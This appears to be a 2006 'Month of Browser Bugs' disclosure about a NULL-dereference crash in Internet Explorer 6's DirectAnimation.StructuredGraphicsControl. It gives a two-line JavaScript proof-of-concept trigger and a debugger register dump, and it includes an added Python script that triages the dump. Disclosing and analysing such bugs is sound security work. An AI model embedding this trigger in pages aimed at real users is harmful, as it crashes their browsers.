MoBB #6: StructuredGraphicsControl SourceURL
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug appears to be triggered by a call to URLOpenBlockingStream() with a NULL pointer referenced by the ppStream argument. The only way I found to trigger this bug is by creating the object through the ActiveXObject interface -- using the standard object/classid syntax (as described here) does not result in a crash.
var a = new ActiveXObject('DirectAnimation.StructuredGraphicsControl');
a.sourceURL = 'CrashingBecauseStreamPtrNotInitialized';
eax=00000000 ebx=7726d35c ecx=02481f30
edx=0013b1a4 esi=00000000 edi=00000000
eip=772ba3bc esp=0013b18c ebp=0013b1b8
772ba3bc 8b08 mov ecx,[eax] ds:0023:00000000=????????
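Reading the dump above: the faulting instruction loads from [eax] while eax is zero. The following triage script is an added example, not part of the original post; it parses the dump as shown on this page, recomputes the effective address from the registers, and classifies the access violation. The names `triage` and `NULL_REGION` and the 64 KB null-region cutoff are assumptions of this example.

```python
import re

# Register dump and faulting instruction copied from the crash output on this page.
CRASH = """\
eax=00000000 ebx=7726d35c ecx=02481f30
edx=0013b1a4 esi=00000000 edi=00000000
eip=772ba3bc esp=0013b18c ebp=0013b1b8
772ba3bc 8b08 mov ecx,[eax] ds:0023:00000000=????????
"""

# Assumption: the lowest 64 KB of a Windows user-mode address space is never mapped.
NULL_REGION = 0x10000

REG = re.compile(r"\b(e[a-z]{2})=([0-9a-f]{8})\b")
INSN = re.compile(r"^([0-9a-f]{8}) [0-9a-f]+ (\w+) (\S+)\s+\w{2}:[0-9a-f]{4}:([0-9a-f]{8})=(\S+)$", re.M)
MEM = re.compile(r"\[(e[a-z]{2})(?:([+-])([0-9a-f]+)h?)?\]")

def triage(dump):
    """Classify an access violation from a debugger register dump in the format above."""
    regs = {name: int(val, 16) for name, val in REG.findall(dump)}
    insn = INSN.search(dump)
    if insn is None:
        raise ValueError("no faulting instruction with a memory operand found")
    addr, mnemonic, operands, shown, content = insn.groups()
    if int(addr, 16) != regs.get("eip"):
        raise ValueError("instruction line does not match eip")
    mem = MEM.search(operands)
    if mem is None:
        raise ValueError("unsupported memory operand: " + operands)
    base, sign, disp = mem.groups()
    offset = int(disp, 16) if disp else 0
    # Recompute the effective address from the registers (32-bit wraparound).
    ea = (regs[base] + (-offset if sign == "-" else offset)) & 0xFFFFFFFF
    if ea != int(shown, 16):
        raise ValueError("effective address disagrees with the debugger output")
    # Heuristic for mov-style instructions: a memory operand in the
    # destination (first) position is a write, otherwise a read.
    access = "write" if "[" in operands.split(",")[0] else "read"
    region = "null-pointer" if ea < NULL_REGION else "wild-pointer"
    return {"base": base, "address": ea, "access": access,
            "unreadable": set(content) == {"?"}, "kind": f"{region} {access}"}

if __name__ == "__main__":
    print(triage(CRASH))
```

For the dump on this page the result is a null-pointer read through eax, which matches the `mov ecx,[eax]` line with `eax=00000000`.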
This bug was reported to Microsoft on March 6th, 2006.
This bug will be added to the OSVDB:
Microsoft IE DirectAnimation.StructuredGraphicsControl SourceURL NULL Dereference